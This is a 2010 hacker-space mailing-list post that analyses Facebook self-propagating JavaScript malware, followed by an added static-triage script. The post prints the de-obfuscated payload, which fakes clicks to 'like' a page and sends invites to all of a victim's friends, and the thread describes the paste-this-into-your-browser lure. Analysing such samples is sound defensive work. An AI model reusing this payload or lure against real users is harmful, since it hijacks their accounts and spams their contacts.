[Noisebridge-discuss] What does this Facebook javascript malware do?

Brian Ferrell endenizen at gmail.com
Fri May 7 18:55:59 UTC 2010


For the curious... DON'T RUN THIS!

Looks like it does just what you expect - 'likes' the app and suggests
it to all your friends.

document.getElementById('app117185681648577_cWsFYs').style = 'hidden';
document.getElementById('app117185681648577_TPCCax').innerHTML =
  document.getElementById('app117185681648577_YbDOrx').value;
s = document.getElementById('suggest');
m = document.getElementById('likeme');
c = document.createEvent('MouseEvents');
c.initEvent('click', true, true);
s.dispatchEvent(c);

setTimeout(function() {
  fs.select_all();
}, 5000);

setTimeout(function() {
  SocialGraphManager.submitDialog('sgm_invite_form',
    '/ajax/social_graph/invite_dialog.php');
}, 5000);

setTimeout(function() {
  m.dispatchEvent(c);
  document.getElementById('app117185681648577_wNPOwN').innerHTML =
    document.getElementById('app117185681648577_djzaef').value;
}, 5000);

On Fri, May 7, 2010 at 11:30, Lee Sonko <lee at lee.org> wrote:
> A friend received this Facebook malware. It told her to copy and paste the
> malware below into her browser. She did :-(
>
> She tells me that it then pulled up a Facebook page and invited all her
> Facebook friends to the malware page.
>
> Can you, the javascript enabled hacker, tell what it does? I'm guessing the
> RegExp runs a substitution cipher on that long string of characters but I'm
> lost from there.
>
> I've been watching the number of "People Like This" on the page grow from
> 1,000 to 1,500 in the past 20 minutes.   :-(
>
> Find it at http://lee.org/temp/malware.txt
>
> Lee
>
>
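
Added example, not part of the original thread or of the analysed script: a static pass over a pasted snippet that, without evaluating it, reports which elements the script clicks on the user's behalf, which request paths it names and which timer delays it uses. The function name `triage`, the report field names and the embedded excerpt are assumptions made for illustration.

```javascript
// Added example (not from the thread): static triage of a pasted script.
// The input is handled as text only and is never evaluated.
function triage(source) {
  const all = (re) => [...source.matchAll(re)];

  // variable -> element id, from `x = document.getElementById('id')`
  const elements = {};
  const lookup = /(?<![.\w])(\w+)\s*=\s*document\.getElementById\(\s*['"]([^'"]+)['"]\s*\)/g;
  for (const m of all(lookup)) elements[m[1]] = m[2];

  // variable -> event type, from `x.initEvent('type', ...)`
  const events = {};
  for (const m of all(/(\w+)\.initEvent\(\s*['"](\w+)['"]/g)) events[m[1]] = m[2];

  // `target.dispatchEvent(ev)`: an event fired by script, not by the user
  const scriptedEvents = all(/(\w+)\.dispatchEvent\(\s*(\w+)\s*\)/g).map((m) => ({
    element: elements[m[1]] || m[1],
    event: events[m[2]] || 'unknown',
  }));

  return {
    scriptedEvents,
    // string literals that look like site-relative request paths
    requestPaths: all(/['"](\/[\w\/.-]+)['"]/g).map((m) => m[1]),
    // delays in ms of timers whose callback is an inline function
    timerDelays: all(/\}\s*,\s*(\d+)\s*\)/g).map((m) => Number(m[1])),
  };
}

// Excerpt of the script quoted in the message above, held as an inert string.
const SAMPLE = `
s = document.getElementById('suggest');
m = document.getElementById('likeme');
c = document.createEvent('MouseEvents');
c.initEvent('click', true, true);
s.dispatchEvent(c);
setTimeout(function() {
  SocialGraphManager.submitDialog('sgm_invite_form', '/ajax/social_graph/invite_dialog.php');
}, 5000);
setTimeout(function() {
  m.dispatchEvent(c);
}, 5000);
`;

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

A report that pairs scripted `click` events with a dialog submission path, as this one does, matches the behaviour described in the thread: the page is liked and suggested to friends without the user clicking anything.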


